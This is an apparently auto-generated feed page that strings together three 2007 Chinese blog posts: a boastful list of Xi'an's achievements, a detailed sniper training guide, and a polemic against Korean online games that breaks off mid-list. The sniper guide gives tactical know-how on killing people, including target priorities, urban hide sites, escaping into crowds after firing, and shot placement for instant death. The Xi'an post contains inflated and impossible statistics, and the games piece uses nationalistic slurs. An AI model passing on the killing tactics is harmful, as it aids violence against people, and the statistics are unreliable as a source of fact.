变速齿轮搜索结果订阅，由FeedsS.com提供

关于西安,让人骄傲

Sat, 4 Aug 2007 09:46:00 GMT

西安高新产业技术开发区是全国唯一三个国家级高新技术开区之一（北京中关村，苏州高新科技园，西安高新技术产业开发区）　　西安的历史文化是全国任何城市没有办法比较的，中国的根扎在这里（5000多年历史-黄帝）。　　西安的军工企业，科研院所数量排全国第3，仅次于北京上海。　　　　神州飞船百分之80的零件是西安生产的　　　　国庆大阅兵一半的武器是西安生产的　　　　全国唯一的卫星测控中心在西安　　　　全国唯一的飞机试飞研究院在西安　　　　西安周围有120多座帝王陵墓围绕　　　　亚洲最大的音乐喷泉-大雁塔北广场西部最大的海洋公园-西安海洋世界-海洋馆　　　　西部最大的野生动物园“西安秦岭野生动物园” 　　　　西安有世界上保存最完整最大的城墙西安有公办高校32所，民办高校29所，在校大学生共120万多人，有著名的西安交通大学，西北工业大学和中国五大政法院校之一的西北政法大学，教育部直属的6所重点师范大学之一“陕西师范大学”，西北农林科技大学，等等（其中进211工程6所，进985工程3所）　　　　陕西省有两院院士43人，其中西安有42人，数量居全国第4，（北京第1，上海2，江苏3）　　　　西安部队院校11所，有全军著名的第四军医大学，第二炮兵工程大学，空军工程大学，武警指挥学院，武警通信学院，西安陆军学院，西安政治学院，武警工程大学等等　　　　还有世界第八大奇迹“兵马俑”！！！黄帝，秦始皇，刘邦，项羽，汉武帝，卫青，霍去病，张骞，司马迁，班超，唐太宗，杨贵妃，王昭君，武则天，李白，杜甫，白居易，孙思邈，等等都是西安历史的见证，也是中华文明的见证！！！！　　　　还有震惊世界的西安事变！！　　　　解放前西安以一票之差落败与北京，没有成为中国的首都！！　　　　军事情况：兰州军区的唯一两个集团军：47军，21军，都驻扎在西安！！　　　　西安有西北第一高楼，全国第6高楼“西北信息大厦” 　　　　西安有5星级酒店7家，4星级酒店34家　　　　西安有全国接待人次第三大旅行社，西安中国国际旅行社　　　　西安有国防军工大厂14家，其中生产导弹4家，炮弹2家，兵器8家，军用重型卡车1家　　　　西安有全国唯一的火箭发动机生产基地067基地　　　　西安有全国唯一的生产卫星导航的研究所504所　　　　西安有全国唯一的生产航空导航控制系统的618所“ 　　　　还有各类研究所40多所　　　　国家测绘局5个测绘大队3个在西安。（广州1个，沈阳1个）　　　　有全军唯一的作战测绘研究所　　　　中国最具活力的六个城市之一全国5大消费向导城市之一（北京、上海、广州、西安、成都）　　　　全国12大吸引人才的城市之一：北京、上海、广州、深圳、南京、天津、西安、杭州、沈阳、成都、济南、哈尔滨　　　　综合科技实力居第三高校数量与（西安有大学44所，学生80万人，其中5个民办高校学生就已达13万）　　　　研究所数量第三（北京、上海、西安。500多个科研机构，34万科技人才使其军工科技力量居全国大中城市第二位，全省有科研单位2000多个，17个专业是全国惟一的，50个专业在全国处于领先地位。有国家级重点实验田10个，国家部门专业，专项实验室63个，省级重点实验室49个，拥有各类专业技术人员85.1万人，院士46人：）、人才密度度雄居各省会城市直辖市第一，国内近次于北京.武汉和西安在每万人在校大学生数方面排名分列第一、第二。　　　　高新技术产业开发区全国第3，入住世界500强210家名企西安04年前四个月固定资产投资额位居全国前十，增副则高达80.4%，高居全国各城市榜首电脑城数量位居前列且塞格是全国十大以及软件产业的发展、西部通信主节点，全国四大节点（北京上海广州西安）之一国内第四大现代艺术城市（广州、上海、北京、西安）、书店数量雄居前列以及西部最大书城-西安图书大厦城市天然气气化工程--全国第一条天然气汽车线路；国内仅此于北京的城市汽化民航-国内内陆四大机场之一，西安的机场客运量排列到全国第6位，在去年运量增长速度全国第一的基础上，04年前一季度又保持了60%的高速增长，又是全国第一。　六大铁路枢纽之一电工城--国际电工组织成员单位，全国最大的高压、超高压交直流输变电设备和通讯电缆、微分电机、电力电子装置等科研、开发、生产、贸易、金融为一体的电工集团之一高压，超高压交直流变压器占据国内70%的市场占有率，并远销欧美，同时通讯电缆、微分电机、电力电子装置都在国内有着高额的市场占有率全国各大空调厂家大部分的空调压缩机都是西安东方机电集团制造西安拥有目前CDMA的核心技术，我国市场上大部分的CDMA都用的是西安大唐电信的芯片目前国内只有4个制造锂电池原料的厂家，而其中规模最大的，产量最高的一家在中国西安小灵通97年在西安上市，并且核心技术始终掌握在这里（斯达康西安研发中心）中国第一枚“长二捆”运载火箭发动机、第一只彩色显像管、第一块集成电路、第一架民用客机、第一台100万伏超高压空气断路器。　　　　西安三元企业集团投资兴建了国内第一家培养游戏设计人才的专业学校，成为企业培养特殊技能软件人才的典范　　　　中国最先全面生产环保型液体洗涤剂的高科技环保化工企业和医药集团　　　　亚洲最大的音乐喷泉广场、中国西部最大的野生动物园、西部最大的唐文化区——曲江旅游文化区　　　　亚洲最大的景观步行街--大唐不夜城 2003年西安市国内生产总值达到943亿元，04年将跻身千亿大关。地处西部在经济上的优势几乎由高科技带动，本土工业重振在即。国内大部分重型汽车都用的是西安制造的变速齿轮。　　　　人口741万，西安接受9年义务教育以上的人口为486.73万，每10万人中拥有大学文化程度的有10932万人。　　　　城市人均可支配收入为7184元，全国13位。　　　　重工业基地:全国大中型军事和民用飞机设计、制造、试飞的重要基地（西飞是国内战斗机生产基地；煤炭储量1625吨；　　　　石油预测远景储量11亿吨，已探明储量7亿吨；　　　　天然气预测储量20000亿立方米，已探明储量3200亿立方米，是我国陆上发现的归大整装气田之一。）　　　　农业现代化：国家唯一一个高新农业示范区杨凌；中国杨林农业高新科技成果博览会，与北京国际周、上海工业博览会、深圳高交会同为中国四大科技展会之一。　　　　交通概况（全市公路里程2800千米，有5条国道和12条省道经过市域，目前，西安至潼关、至黄陵、至天水、至阎良、至蓝田高等级公路已建成通车。使西安成为连通省内及西北、中原、西南的重要交通枢纽；东起中国连云港、西至荷兰鹿特丹的横跨欧亚大陆的铁路线从西安市区穿过：　　　　西安国际航空港西安咸阳国际机场已开通国际国内航线80多条,西安有8条国道和2条西部大通道汇集，有7条干支铁路交汇。

中国特种部队狙击手训练最详细教程被披露

Fri, 3 Aug 2007 08:24:19 GMT

中国特种部队狙击手训练最详细教程被披露更多军事文学:http://blog.sina.com.cn/wujiangleng 　　一个良好的狙击手需要具备三个条件，优秀的射击技术只是所有狙击技巧中最后也是最基础的一点，纪律及细心才是最重要的元素，狙击手并不是拿着枪胡乱扫射的杀人狂，他们不必要时不会杀害无威胁非武装人员，例如妇女，儿童，牲畜，建筑房屋等，狙击手有时是一个人，也可能2、3人，这要看任务的性质而定，单为射击而盲目的向目标射击只会增加被发现、俘虏及杀害的机会，纪律和耐心是非常重要的，尤其是要面对射与不射的时候。在成为一个狙击手之前必须先问问自己：你是否很怕冷或怕热？是否很容易发怒？愤怒会使你不小心以及做一些不寻常的行为，这是最坏的一点。有没有尝试过一个人单独过一个星期甚至更长时间？能否没有朋友，没有家庭，没有通讯，没有联络或什么都没有？是否有过一个人露营？在一个地方内什么人也没有，你会觉得怎么样？你又会在那里做什么？狙击手并不一定是个孤独者，但事实上如果你每曰的生活都不能缺少其他人的存在的话，狙击手一定不是你最好的选择。　　为什么这些很重要呢？一个狙击手只为了开一枪而爬行一整天，有时还可能什么也找不到，你是否能一枪不发而放弃任务？有时你见到目标而开枪的机会只有三秒钟，假如你在做白曰梦，吃饭又或者其他无为事情，你便失败了。你必须了解你的任务、位置并等待目标出现，这是你需要队友的原因，一个人用望远镜连续观察超过20分钟是十分困难的，你必须整天保持不动以避免敌人的发现，这听来十分容易但其实十分困难，一个初学钓鱼者要将鱼线留在水面以下超过三分钟是不可能的，因为他们总想要把鱼钩提上来看看，如果你有打猎的经验你会知道在猎物面前保持不动是如何艰难，更何况现在的你面对的猎物是一看见你就会向你开枪的人呢？你怎样解释“细心”一词？对一名优秀的狙击手来说细心就是他的一切，而且影响着他的决定，单是细心已经可以令一个狙击手成功，狙击手行动前必须决定要身处哪里，怎么走，怎么去，带什么装备，用什么伪装，如何通讯，行动时如遇紧急情况应该如何，任务完成如何撤退，无法完成又怎样避免损失？一个狙击手必须由开始到结束详细思考所有程序，其武器及子弹补给装备配置才会产生效果，射击术是最后的要素，一个狙击手在任何情况下都需要在最远的有效射程射击目标，距离等于撤退的生命时间。如果要做到射法纯熟，最少需要练习15000-20000发子弹才算得上是合格练习。　　一、狙击手的历史　　早在17世纪初光学仪器发明的同时狙击手的发展即已经开始了，但在整整两个世纪中战术狙击技术的发展却因为枪械工艺发展缓慢而未曾崭露头角。直到美国独立战争期间美国义勇军的一位夏普少校以特别改造过的枪械与各种小技巧（例如将每发圆球形的子弹都以浸透油脂的鹿皮包住，在装弹时不仅更方便，射程与精度亦随之提升）带领一队独立、高机动性的枪手以当时来看是不可思议的长距离（大约300-350米）精确狙击射杀了多名英军高级军官，多次以及小代价挽回一场战役的局势，而从此英文就出现了一个新的单词——Sharp shooters（夏普的射手们），意指射击精确而又冷静沉着的射手。为了长时间的贴腮瞄准与防止野外环境导致分心，夏普射手们在进行狙击任务时经常戴类似今曰特种部队戴的面罩，因此又有了一个新名字为Markman，直译为戴面具的人，在英文中也指枪法或射击准确的人，而这两个词在今曰则由Sniper这个词所取代，也就是“狙击手”。美国南北战争期间Hiram Berdan将军曾招训一个特别小组，针对射击与狙击的精要一一加以阐述，此举可视为美军正式训练狙击手的发源。　　二、狙击手的任务　　狙击手的任务按照性质来分，有指定猎杀、随队观察、火力支援、巡逻狩猎、非硬性装备破坏与定点清除几种，以下就各种不同的任务性质分述如下：　　1、指定猎杀　　即将上级所指定被狙击的目标以一切手段终结就算完成任务，狙击手狙杀目标无论什么方法都可以，以步枪远程狙击只是方法的一种，十字弓、猎弓、吹箭、弩箭、飞刀甚至近身搏击、格斗、刀具、绞杀器或下毒都可以，身着伪装服以步枪狙击的远距离猎杀只是一般人对狙击手的错误印象，不过在军事性的任务中远离目标的远程狙杀仍是大多数狙击手的选择，而大多数的训练也朝此种方向来施以训练，所这里只介绍枪械狙击。　　指定猎杀的执行方式很多种，较长被采用的方法是狙击手潜行至目标所在基地或预期经过的道路上以伏击的方式进行狙杀，而由于现代步枪的射程几乎都超过1000m以上，地点的选择、射击与后撤路线的安排经常是任务成败的关键，因此任务目标区的先行勘探与地点选定是相当重要的功课。虽然现代的卫星可以照到地球的每个角落，但在树木参天的密林与山谷暗处仍是以人员所侦查的第一手情报最可靠，而大多数的狙击手也宁可自行侦察而不愿依靠先进的卫星科技。　　　指定猎杀的任务可以1人执行，也适用于2人小组，以一人观察1人狙击，或者2人同时狙击，或主射手未能成功时副射手再补一枪，当然副射手的枪法也必须是一流的，并且随时维持准备瞄准射击的状态。　　2、随队观察及火力支援　　在现代部队中狙击手是编制到班、排级等基层战斗单位。当小队在进行战斗巡逻任务，遭遇敌人远程火力（也许是重炮、迫击炮、重机枪或敌人的狙击手）攻击而又无法呼叫火力支援时，随队的狙击手便必须立即进行敌人火力观察的任务并立即进入有利的射击位置以狙击步枪格杀最大威胁敌人，并依序将敌方人员一一狙杀，而小部队则利用敌人遭狙杀、人人自顾不暇之际转移。一支步枪所能发挥的效果与远程炮兵的火力支援一样，这便是所谓的随队观察及火力支援。　　但这仅是随队观察任务的一部分而已，随队狙击手最重要的任务是以狙击手的角度与眼光来看任务小队的所在位置是否过于容易遭受狙击并随时检查各个可能躲着狙击手的角落，是否有敌人的狙击手潜伏？并在第一时间内解决敌人的狙击手，另外狙击手同时也是路线选定与脱逃专家，在受到伏击时随队狙击手除了提供火力支援外也必须在可能的情况下提供小队指挥官最佳撤退路线建议并全程提供火力支援与掩护，必要时狙击手将会单独行动前往地区进行狙击任务，迫使敌人暂缓追击小队的火力，给小队最大的空间，狙击手再依事先的约定前往汇合点或自行完成指定任务，而大部分的狙击手由于长期的眼力训练与注意力训练，诡雷的发现与拆除对很多狙击手而言并非难事，虽然很少是由狙击手进行拆弹工作但是一旦任务需要时狙击手应可轻松胜任。　　我军狙击手的任务还包括在平时即记录各个可能潜伏地点与敌阵地位置，并针对阵地周围情况进行观察、记录、判断与模拟可能状况，一旦状况发生变化时本身可立即进入情况，也可以提供情报供战地指挥官作分析判断，因此狙击手同时肩负着情报官的工作，但无论在什么情况下狙击手总是以其专业的眼光来看待这个世界，同时以专业的角度判断情势的变化，永远是指挥官们了解情报的权威管道，因为只有狙击手才能了解并知道狙击手的想法与做法，也才能知道如何去预防与侦测。　　3、巡逻狩猎　　在许多情况下战地的情势经常是扑朔迷离的，既不知人、时、地、事物，也不知情势的发展与变化，为了确保情势对我有利，猎杀敌人重要关键人员是一个釜底抽薪之计，而由于情报有限，任务目标指派会造成困扰，因此以指定区域进行自由猎杀便成为有效的作战模式，以狙击小组在指定区域内进行猎杀往往会受到莫名的奇效。倘若任务失败损失的也不过是2名人员与其随身装备而已，可谓本轻利重之买卖，但由于情势的变化往往出人意表之外，巡逻狩猎任务的执行时间往往不长，最多以2周为限，以防任务的执行与局势的发展产生落差。　　4、非硬性装备破坏　　前面提到狙击手的任务往往不单纯是人员的狙杀，装备的破坏亦为重点项目，特别是对于机械化部队而言，非强化装甲的一般车辆都能由7.62mm口径的狙击步枪造成致命性破坏，以常见的2.5吨载重卡车而言，直接射击水箱、轮胎会造成车辆无法行驶，但若直接射击油箱则会使车辆产生糖浆，若车辆装载的是油料、弹药等高易燃性物质则可造成更大的破坏。若是整队的坦克战车当然无法以步枪解决，但若解决部分的战车车长也值回成本，要诀是须由后向前格杀车长，根据经验，在45秒内即使是同车乘员亦无法判断出车长是否已经遭袭身亡，而前车更是非经呼叫3-5分钟内不会发现后车的动态，这段期间内被狙杀的车长也不只个位数了，若战车以紧闭舱盖方式前进狙击手也可利用击毁通讯天线或击爆车外副油箱的方式逼使人员离开车体后再一一狙杀。　　对付战斗直升机亦然，击毁其光电观测器就等于毁其耳目，而击毁其主旋翼与尾旋翼则如同废其四肢，若是射击接近排气孔部位的变速齿轮箱与液压管亦会造成飞机失事坠机，不然射击火箭弹仓造成火箭内燃使弹药在未脱离机身前糖浆也是解决攻击直升机的方式之一。　　通讯车、基地等高精密仪器的破坏则更为简单，于电源车、冷却器、通讯天线与精密电路、晶片所在位置随便一发子弹都可以对这些价值不菲的装备造成致命性破坏，其他像是油料的对方电、车辆调度场与弹药堆积所等地也可以用步枪加以破坏。以油料堆放点而言，首先以一发微声铅质软弹头击穿油桶但不使其糖浆，等油料外泄得到处都是后再以一发高爆弹、燃烧弹或曳光弹加以引爆，那时就会惊天动地一发不可收拾。破坏性狙击任务的执行要诀就是先知道要打什么，再决定用何种弹药射击什么部位，三个条件要素都具备的话任务便不难达成了。　　5、定点伏击　　由于狙击地点的所在位置必须考虑很多因素，寻之不易，一个好的狙击点不善加利用实在太可单，??击目标选择上则有一个狙击手们都知道的优先序列：　　1）敌方狙击手，唯一会对狙击手造成威胁的便是敌方狙击手，敌方狙击手永远列为第一顺为　　2）高级指挥官　　3）防空导弹、反坦克导弹操作员　　4）重炮观测手、炮手、炮长、副炮长、轻重机枪射手与迫击炮炮长等长程攻击武器操作员　　5）资深士官或士官长　　6）枪榴弹兵、爆破小组与战地工兵　　除了这些优先顺序外其余目标与执行的先后顺序则由狙击手自行决定，而其判定的标准是对我方威胁性较大者优先顺序越高，不但是人员，装备亦然，油料车与弹药车的优先顺序必然高于人员输送车的道理永远是不会改的，除非有战略上的考虑，但那已经不是狙击手的责任范围了。　　6、狙击手于市区的任务　　试想特种部队突然被派到一个陌生的地方参与维持和平部队的解围，又或者要到大城市市区维持秩序、处理劫机事件、解救被挟持的人质及保护无辜市民，一个狙击手出于什么角色呢？在这种情况下使用狙击手是否是一个最恰当的选择呢？答案明显是“是”。　　狙击手到达一个被武装分子控制的区域内，其任务就是在获得上级指令及核准后向特定的目标发出最准确的攻击，然而此情况只会在指挥官认为武装分子即将对部队或拼命作出伤害，否则指挥官在正常情况下不会向狙击手发出此指令及核准。狙击手身处这情况下其更加重要的的任务是收集及报告，除此之外跟随情况及需要狙击手还会被委派以下任务：　　1）清除区域内武装分子的狙击手　　2）清除区域内进行抢劫、绑架、挟持人质等等的武装分子　　3）负责对一个特定的区域进行观察及监视，并记录及报告区域内的军事活动　　4）利用自己处身隐蔽的优势协助其他部队行动　　5）保护区域内其他部队，包括消防队，工程队等等　　7、狙击手在市区环境执行任务的技巧　　A、行动位置　　怎样在一个充满敌人的地方安排狙击手执行任务而又不能被发现是一个值得考虑的问题，这并不是没有可能，但需要高强度的训练。不单指狙击手本身，就连支援部队也需这样。在每天的行动中为了不被敌方发现及保障狙击手自身安全，有时候需要分散敌人的注意力，维持和平部队通常驻守一些比较危险的位置使敌人注意。狙击手应尽量选择远离维持和平部队的地方作为行动的据点，使维持和平部队成为分散敌人注意力的工具，以免被敌人发现。为了避开敌人的巡逻队伍和侦察耳目狙击手须在一段时间转移行动位置，不然长期停留一个行动位置只会使狙击手被敌人发现。　　B、市区狙击及藏身地点　　选择狙击及藏身位置对狙击手来说是行动中成败的关键，能否勘查整个区域就是能否控制整个区域的主要因素。依常理来说选择狙击位置通常是越高越好，这就是我们常说的“制高点”，但对于市区的战斗环境来讲这是一个致命的错误，因为狙击手需要从制高点向下俯瞰整个区域而经常忽略身边的即时危险，举例：狙击位置位于一栋20层大厦的顶楼平台，狙击手要观察下面的大街他便要探头出去俯瞰，位置立刻就会暴露，到时狙击手对于附近环境所需要应付的突发情况及意外就无法预计了，而这些突发情况及意外更是比下面的大街接近和快速，例如对面的楼宇藏匿了敌人狙击手，那便非常危险了。模仿电影电视剧中在楼顶天台开枪是非常愚蠢的事情，切记任何时候都不要以天空作为背景色，如果那样随便一名接受完基础射击训练的敌方狙击手可以在200米外轻松命中你身上“10环”的位置，所以于市区环境选择狙击位置必须全面兼顾近、中、远三个距离，狙击位置应设于不高过15米的地方，就算暴露了位置也有足够的时间跑到大街上混入人群当中逃走，除非任务性质特殊（一般是警方任务，没有战术要求也不管善后事宜，只负责受命开枪）否则绝对不建议再往更高楼层走，最愚蠢的狙击手也知道那里是死路一条。　　以下作为狙击及藏身的地方：　　1）破旧的楼宇或建筑物。对于此类地方狙击手必须堤防陷阱，一个最好的方法就是留意有没有人经常在这楼宇出入，特别是小孩。（反之亦可加以利用）　　2）商店　　3）学校或社团聚集地，例如教堂剧院　　4）工厂　　5）市区附近已经荒废的地方　　6）楼宇两层之间　　这是一个非常好地的狙击及藏身位置，纵使没有窗也没有一个良好的射击平台。在这些地方要移去某些砖块或石块去制造一个窗口或射击平台，但是这些砖块石块于观察及射击后必须放回原位，否则会影响楼宇外观而引起敌人注意。　　8、综合来说，一个良好的狙击及藏身位置应有以下特征：　　1）有一条安全及宁静的路线，如果可以的话应尽量避开空罐、破旧的墙、经常有猫狗类出现地以及其他会暴露狙击手存在的地方　　2）有一个安全的出口及入口　　3）有宽阔的观察角度　　4）舒适（大部分狙击手都不会把这条作为参考条件）　　9、当一个狙击手设立一个狙击及藏身位置之前应先考虑以下几点：　　1）获委派任务的性质　　2）须逗留的时间　　3）当地情况及形势　　4）进入位置的时间及步骤　　5）紧急撤离的步骤　　6）友军部队的行动　　7）撤离位置的时间及步骤　　8）所需要的特别装备　　10、处理挟持人质事件　　不论指挥官或狙击手本人都希望子弹击中恐怖分子令其立即死亡，但就算是最好的狙击手配合最好的狙击步枪及子弹也绝对不能保证有此理想的效果。因为纵使该名恐怖分子刹那中弹，手臂神经和肌肉不自主的痉挛抽搐也会导致向人质开枪射击，所以指挥官在无其他选择的情况下才会使用狙击手应付挟持人质的情况。　　A、准确度的要求：　　所有的医生都知道人体只有一个地方被破坏才会使得瞬间即时死亡，这就是大脑的运动反射神经区（心脏中枪者仍可存活8-12秒的时间），人的头部算是比较大的目标，直径大约有20-25公分，但能够真正使得瞬间即时死亡的部分其实非常小，脑部控制运动反射神经的地方位于眼睛后面，其大小不足6公分，换言之狙击手要想一枪瞬间毙命他实际所能瞄准的目标只有6公分而不是20-25公分，再加上湿度、密度、风向、角度、气压、子弹抛物线以及后作用力的影响，要一个普通的特种部队狙击手于200米外发出能做到瞬间即时死亡的一击是十分困难的，要达到这个目标狙击手需要在不同环境中练习使用多种狙击步枪与子弹的配合，以致熟练了解瞄准的方位角度。　　B、狙击位置的选择：　　这与之前所提及过关于市区战场选择狙击及藏身位置的课题并没有多大分别，射击位置的高度选择不再是局限，只是需要将之前的理论充分运用便可找到合适的狙击位置了，但必须注意以下事项：　　1）虽然狙击手是到了非用不可的情况下才被使用甚至绝大部分任务一枪不发，但狙击手也必须尽早到达现场，因为狙击手需要准确测量目标距离，确认恐怖分子及人质方位，选择最佳射击位置及演练虚拟射击。　　2）如果情况环境需要射穿玻璃，狙击手必须注意以下两点：　　（1）当子弹穿透玻璃的同时其金属外壳会被玻璃刮落部分碎屑以圆锥形范围随机射出，情况与散弹枪的原理一样，不论击中恐怖分子或人质都可能造成受伤甚至死亡，而弹体本身仍然会继续以直线飞向目标，就算成45度角撞击玻璃此情况也是一样。　　（2）当子弹撞击玻璃的时候，玻璃碎片会以90度垂直向房内飞去，此点必须留意。　　三、选择最佳狙击位置　　一位公认的前苏联超级狙击手瓦西里曾经讲过：“狙击手在战场上的任务就是发现而不被看见，杀而不被杀。”怎样能做到看见而不被发现，杀而不被杀呢？关键是狙击手要懂得如何选择一个良好的狙击位置与隐藏自己　　1、选择位置　　当狙击手确定了需要进行任务的范围后就需要立即选择一个有利地点进行任务，但不要忘记一个对于狙击手看来是理想的观察地点也将会是敌人同样认为的一个好地方，所以狙击手必须避免选择一些显眼的地方及远离一些惹人注意和容易分辨的物体及地形，在考虑选择狙击位置的时候应以以下两者的平衡作决定：　　1、它为进行射击及观察提供最优良的效果　　2、它为防止敌人的发现提供最优良的隐蔽效果　　2、流动狙击位置　　基于大部分狙击任务的有限条件狙击手很多时候都需要伏地射击，所以狙击手大部分时间都会利用一个流动狙击位置。使用天然掩护和伪装狙击手便可以在任何地形俯伏观察和射击，在使用流动狙击位置的时候狙击手或狙击队需要尽自己的能力及身边所有资源去融入背景和地形，并经常需要利用有阴影的地方，使用合适的伪装技术于使用流动狙击位置去射击及观察的时候便可以有效地避免被敌人察觉。当流动狙击位置无可避免的需要设在一个开阔的环境那便需要极度小心使用地形，例如矮树和凹下去的位置去隐藏，使用伪装网也可以减低被发现的机会。对于狙击手或狙击小队选择流动狙击位置是没有限制的，基于任何情况下，狙击手可能需要在树上、屋顶、隧道、灯塔、阴影、小船及其它可能的地点。　　3、狙击位置的安全性　　就算有了一个良好的狙击位置也并非代表狙击手百分百处于安全，狙击手仍然需要保持警觉，以及谨记以下能影响自身安全的要点：　　1）当情况允许的时候选择及设立一个观察与射击均可的狙击位置，因为就算小小的移动也可能给敌人察觉，纵使在晚间也要防备敌人配有夜视装备，而且任何声音在晚间都特别明显　　2）狙击手要留意自己的位置是否处于一个颜色及地形对比度大的位置上，因为这些地方有任何改变都是非常惹人注目的　　3）当选择狙击位置的时候应首先考虑那些敌人不经常巡逻出没的地方　最远射程内，而且射程内尽量避免物体阻碍视线　　5）应当尽量设立一个可以有效覆盖整个范围的狙击位视下，当移动到狙击位置的途中应行经有最多掩护的地方并为自己的身体加上伪装　　7）避免制造声音　　8）避免不必要的动作　　9）避免天空作为狙击位置的背景　　10）小心望远镜或瞄准镜的镜片会反射阳光　　11）在建筑物内进行观察应躲在阴影内　　12）进出狙击位置的时候应把来回所留下的脚印和记号消除　　4、狙击位置的生活　　在到达狙击位置后狙击手应将武器和装备放在方便自己随时拿到的位置，继续观察和收集敌人的情况作为情报用途，狙击手应按自己观察、进食、睡觉及休息的生活规律，两名狙击手应轮流休息，利于长期的狙击任务内仍能保持身体在高效率之中。狙击队应时常保持安静，所以手势是相互沟通最好的工具，以下是一些常用的手势：　　1）指着自己——我、我的　　2）指着别人——你、你的　　3）拇指上竖——好的、去、是　　4）拇指向下——不好、不、不要去　　5）四指并拢遮住眼睛——看不见、视线、位置不好　　6）食指中指指向自己眼睛——看见、可视的　　7）用手作刀在喉咙上作切的动作——已死、杀　　8）五指指尖朝上合拢——集合、在一起、靠拢　　9）举起拳头——停止　　10）手掌朝下平举于额头——成人　　11）手掌成罩状扣于胸前--女性　　12）手掌朝下平举于胸前--儿童　　13）手掌成爪状向下——动物　　14）拇指和其余四指围成圈状——目标、有情况　　狙击手能否在战场中完成任务完全取决于狙击手对于不同环境下能否充分运用移动、隐藏、观察及伪装的技巧，这些也是狙击手在以寡敌众的情况下能否生存的重要关键。中国话——不打台湾的原因

细数韩国网游七宗罪

Mon, 30 Jul 2007 14:27:00 GMT

　　【编者按】　　写在韩国网游在华遭遇七年之痒之际　　【eNet特约评论】北京时间7月27日，完美时空登陆美国纳斯达克。上市首日，完美时空股价大涨27.5%。与之形成鲜明对比的是，原定于7月12日在大阪上市的久游网，如今却陷入了无尽的等待中。而这一切都拜韩国网游开发商T3所赐。T3的一纸指控久游网拖欠分账款的诉状拖住了久游网上市的脚步。　　掐住算来距离第一款韩国网游《黑暗之光》进入中国已经7年了。7年，足以让中国人看清韩国网游的“七宗罪”了。　　第一宗罪：技术落后　　韩国网游先天就缺乏技术积累。韩国的网游产业当年不过是依靠政府开发的一个通用游戏引擎开始发家的。而进入中国的韩国网游中，更充斥了大量的劣质品。有业内人士透露，由于2001～2002年期间，中国市场对韩国网游的需求巨大，所以“一款游戏开发到30%—40%左右就与大陆的运营公司签定代理合同，直到开始商业运营时，其开发期只有6个月。”而业内普遍认同的开发周期则在18个月左右，这就为将来的运营埋下了隐患。　　最典型的例子就是《孔雀王》。当年奥美满心欣喜地想凭借这款游戏进军网游领域。运营的时候才发现，这个游戏不过是一个半成品而已，bug无数且不说，甚至根本承载不起数万玩家同时在线的负荷。因此，《孔雀王》也成了中国第一个商业运营后倒下的网游！而在日后因为技术缺陷倒下的韩国网游还有《精灵》、《神话》等等——无一不打着“残次品”的标签！　　第二宗罪：同质严重　　比技术韩国网游不如欧美同行，比创意韩国网游更是乏善可陈。如果说韩国网游还有特色的话，那么它的特色就是“同质严重”！别管广告语写得多么漂亮，尝试一下就不难发现绝大多数韩国网游都是似曾相识的。除了数都数不清的BUG之外，韩国MMORPG网游就剩下“PK＋打怪＋升级”这三个始终不变的“老三件”了。　　当然，韩国网游也在尝试改变——但是，它改变的方式就是“跟风”。《暗黑破坏神》火了，一堆韩版的Diablo网游就纷纷现身了；《魔兽世界》火了，韩国网游就开始做任务系统了；“借鉴”任天堂创意的《跑跑卡丁车》火了，《光线飞车》等一干跟风之作就迅速上马了。跟风的结果就是“同质化”的进一步延续。所以，韩国网游绝对没有可能摆脱“泡菜网游”的恶名！　　第三宗罪：售后缺失　　没技术没创意也就算了，韩国网游最让人心寒的是连服务也没有。中国的国情和韩国这种小国不同。在韩国，《劲舞团》之流的游戏不过数百人的同时在线人数而已；而在中国，这一数字可能要以数十万计。在韩国，也很少有外挂、私服之类的侵扰。所以，中国的网游需要更多的售后服务支持。可惜，半岛心理使得韩国人从来不会正视发生在韩国以外的事情…… 　　所以，外挂横行、私服遍地成了韩国网游在华的一道别样的风景。《传奇》、《RO》、《A3》等在中国红极一时的韩国网游哪一个不是外挂、私服的天堂？最有代表性的例子是《使命》。2004年5月1日，由于在产品技术方面存在着严重不足和缺陷，在韩方不予解决后，国内运营商无奈宣布停止运营。据了解，《使命》外挂横行，连最简单的变速齿轮都没办法杜绝使用，而韩方在这些方面从来都不与理睬——因为，他们正在忙着炮制另一款“泡菜网游”呢！　　第四宗罪：恶意勒索　　当然，韩国网游厂商偶尔也是愿意关心一下服务问题。不过，这份关心是有代价的。T3“关心”一次久游网运营的《劲舞团》的代价就是400万美元。久游网向媒体展示的一份传真件显示，其向T3公司支付了一笔被描述为“青少年保护系统平台”的费用，其金额为400万美元，下有T3首席执行官Koo Young Kim的签名。久游网方面声称，这笔费用是T3因为防沉迷系统而敲诈久游网600万美元中先期支付的部分。而当时的久游网正处于上市前的缄默期，因此也不得不息事宁人。　　当然，比T3更狠的还有Ncsoft。T3“勒索”的是钱，而Ncsoft“勒索”的是权。在Ncsoft一再的打压和强加干涉之下，新浪在新浪乐谷的话语权始终难以得到保证。这也直接导致《天堂》和《天堂2》在中国运营的业绩一直是不温不火。最终事件以新浪退出新浪乐谷，《天堂》系列稳居“三流”行列而告终。　　第五宗罪：哄抬价格　　虽然产品品质差，但是韩国网游厂商哄抬价格可是有着一手。君不见，T3凭借着几张贴图就让九城答应为《劲舞团2》掏出数千万美元了吗？据悉，在版权金的谈判上，韩国网游公司一般会同时找好几家运营商来谈，把在A公司谈好的价格再拿去和B公司谈，以达到哄抬价格的目的，这也是很多韩国网游价格虚高的原因。在《劲舞团2》的天价版权金背后，就可以看到T3“长袖善舞”的身影。　　据业内人士透露，几年以前韩国国内网游的行业协会就有一条不成文的规定，那就是韩国网游出口中国，其签约金不得低于50万美金，近年来这一金额大有水涨船高之势。这种带有垄断性质的行规让许多中国的游戏运营商背上了沉重的包袱，并最终把成本和风险转嫁到玩家身上。　　第六宗罪：嫉贤妒能　　韩方的恶劣行径最终导致了盛大、久游网等民族网游企业走上了自主研发的道路。而最终的结果也让我们进一步看清了韩国人的实力：在东南亚，盛大的《疯狂赛车》压制了Nexon的《跑跑卡丁车》；在美国，久游网的《超级舞者》也击败了T3的《劲舞团》。　　实力有限的韩国网游厂商对于中国网游厂商的恐惧是天生的。面对日渐崛起的中国网游厂商，它们也显示出了“嫉贤妒能”的本性。技术封锁已经是一个公开的秘密。而法律武器也频频被韩国网游厂商动用。无论是T3起诉久游网，还是当年Actoz起诉盛大，都是在后者上市前夕。韩国网游厂商希望用这种办法绊住它们在中国的竞争对手！让人叹息的是，中国运营商面对这些韩国无赖似乎并没有更好的解决方法。盛大收购Actoz虽然解决了版权纠纷，却不得不长时期为Actoz在股市的拙劣表现买单…… 　　第七宗罪：涉嫌违规　　